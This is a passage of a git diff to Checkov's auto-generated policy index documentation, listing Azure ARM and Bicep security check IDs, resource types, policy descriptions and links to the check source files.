[DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py) | +| 76 | CKV_AZURE_76 | resource | Microsoft.Batch/batchAccounts | Ensure that Azure Batch account uses key vault to encrypt data | arm | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py) | +| 77 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a 
part of the web app | arm | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) | +| 78 | CKV_AZURE_82 | resource | Microsoft.Web/sites | Ensure that 'Python version' is the latest, if used to run the web app | arm | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePythonVersion.py) | +| 79 | CKV_AZURE_83 | resource | Microsoft.Web/sites | Ensure that 'Java version' is the latest, if used to run the web app | arm | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceJavaVersion.py) | +| 80 | CKV_AZURE_84 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for Storage | arm | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnStorage.py) | +| 81 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | arm | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) | +| 82 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | arm | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) | +| 83 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | arm | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) | +| 84 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | arm | 
[MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) | +| 85 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | arm | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) | +| 86 | CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | arm | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) | +| 87 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | +| 88 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | +| 89 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | arm | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) | +| 90 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | arm | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) | +| 91 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data 
Factory uses Git repository for source control | arm | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) | +| 92 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | arm | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) | +| 93 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | arm | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) | +| 94 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | arm | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) | +| 95 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | arm | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) | +| 96 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | arm | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) | +| 97 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | arm | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) | +| 98 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | arm | 
[AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) | +| 99 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | arm | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) | +| 100 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | arm | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) | +| 101 | CKV_AZURE_131 | parameter | secureString | SecureString parameter should not have hardcoded default values | arm | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/parameter/SecureStringParameterNoHardcodedValue.py) | +| 102 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | arm | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) | +| 103 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | arm | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) | +| 104 | CKV_AZURE_145 | resource | Microsoft.Web/sites | Ensure Function app is using the latest version of TLS encryption | arm | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) | +| 105 | CKV_AZURE_145 | resource | 
Microsoft.Web/sites/slots | Ensure Function app is using the latest version of TLS encryption | arm | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) | +| 106 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | +| 107 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | +| 108 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | arm | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) | +| 109 | CKV_AZURE_158 | resource | Microsoft.Databricks/workspaces | Ensure Databricks Workspace data plane to control plane communication happens over private link | arm | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py) | +| 110 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | arm | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | +| 111 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | arm | 
[NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | +| 112 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | arm | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) | +| 113 | CKV_AZURE_218 | resource | Microsoft.Network/applicationGateways | Ensure Application Gateway defines secure protocols for in transit communication | arm | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py) | +| 114 | CKV_AZURE_236 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts enable local authentication | arm | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py) | +| 115 | CKV_AZURE_238 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services account is not configured with managed identity | arm | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py) | +| 116 | CKV_AZURE_239 | resource | Microsoft.MachineLearningServices/workspaces | Ensure Azure Machine learning workspace is not configured with private endpoint | arm | [AzureMLWorkspacePrivateEndpoint.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py) | +| 117 | CKV2_AZURE_23 | resource | Microsoft.AppPlatform/Spring | Ensure Azure spring cloud is configured with Virtual network (Vnet) | arm | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureSpringCloudConfigWithVnet.yaml) | 
+| 118 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | arm | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) | +| 119 | CKV2_AZURE_48 | resource | Microsoft.Databricks/workspaces | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption | arm | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py) | +| 120 | CKV2_AZURE_49 | resource | Microsoft.MachineLearningServices/workspaces | Ensure that Azure Machine learning workspace is not configured with overly permissive network access | arm | [AzureMLWorkspacePublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureMLWorkspacePublicNetwork.yaml) | --- diff --git a/docs/5.Policy Index/bicep.md b/docs/5.Policy Index/bicep.md index 0027b28b597..aed93924bf2 100644 --- a/docs/5.Policy Index/bicep.md +++ b/docs/5.Policy Index/bicep.md 
@@ -6,105 +6,130 @@ nav_order: 1 # bicep resource scans (auto generated) -| | Id | Type | Entity | Policy | IaC | Resource Link | -|----|---------------|-----------|------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------|-------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| 0 | CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) | -| 1 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | Bicep | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) | -| 2 | CKV_AZURE_3 | resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | Bicep | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountsTransportEncryption.py) | -| 3 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | Bicep | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) | -| 4 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | Bicep | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) | -| 5 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an 
API Server Authorized IP Ranges enabled | Bicep | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) | -| 6 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | Bicep | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) | -| 7 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | Bicep | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) | -| 8 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | -| 9 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | -| 10 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | -| 11 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | -| 12 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | 
Bicep | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) | -| 13 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 14 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 15 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 16 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 17 | CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | -| 18 | CKV_AZURE_13 | resource | config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | -| 19 | CKV_AZURE_14 | resource | 
Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Bicep | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) | -| 20 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption | Bicep | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) | -| 21 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | Bicep | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) | -| 22 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Bicep | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) | -| 23 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | Bicep | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | -| 24 | CKV_AZURE_19 | resource | Microsoft.Security/pricings | Ensure that standard pricing tier is selected | Bicep | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | -| 25 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | Bicep | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | -| 26 | CKV_AZURE_21 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high 
severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | -| 27 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | -| 28 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 29 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 30 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 31 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 32 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Bicep | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml) | -| 33 | CKV_AZURE_24 | resource | 
Microsoft.Sql/servers/auditingSettings | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Bicep | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml) | -| 34 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is set to 'All' | Bicep | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) | -| 35 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Bicep | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) | -| 36 | CKV_AZURE_27 | resource | Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Bicep | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) | -| 37 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Bicep | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) | -| 38 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | Bicep | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) | -| 39 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | 
[PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 40 | CKV_AZURE_30 | resource | configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 41 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 42 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 43 | CKV_AZURE_32 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 44 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 45 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service 
for read, write and delete requests | Bicep | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) | -| 46 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 47 | CKV_AZURE_34 | resource | blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 48 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 49 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | Bicep | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | -| 50 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Bicep | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | -| 51 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | Bicep | 
[MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) | -| 52 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | Bicep | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) | -| 53 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom subscription owner roles are created | Bicep | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) | -| 54 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | Bicep | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) | -| 55 | CKV_AZURE_41 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | Bicep | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) | -| 56 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | Bicep | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) | -| 57 | CKV_AZURE_44 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | Bicep | 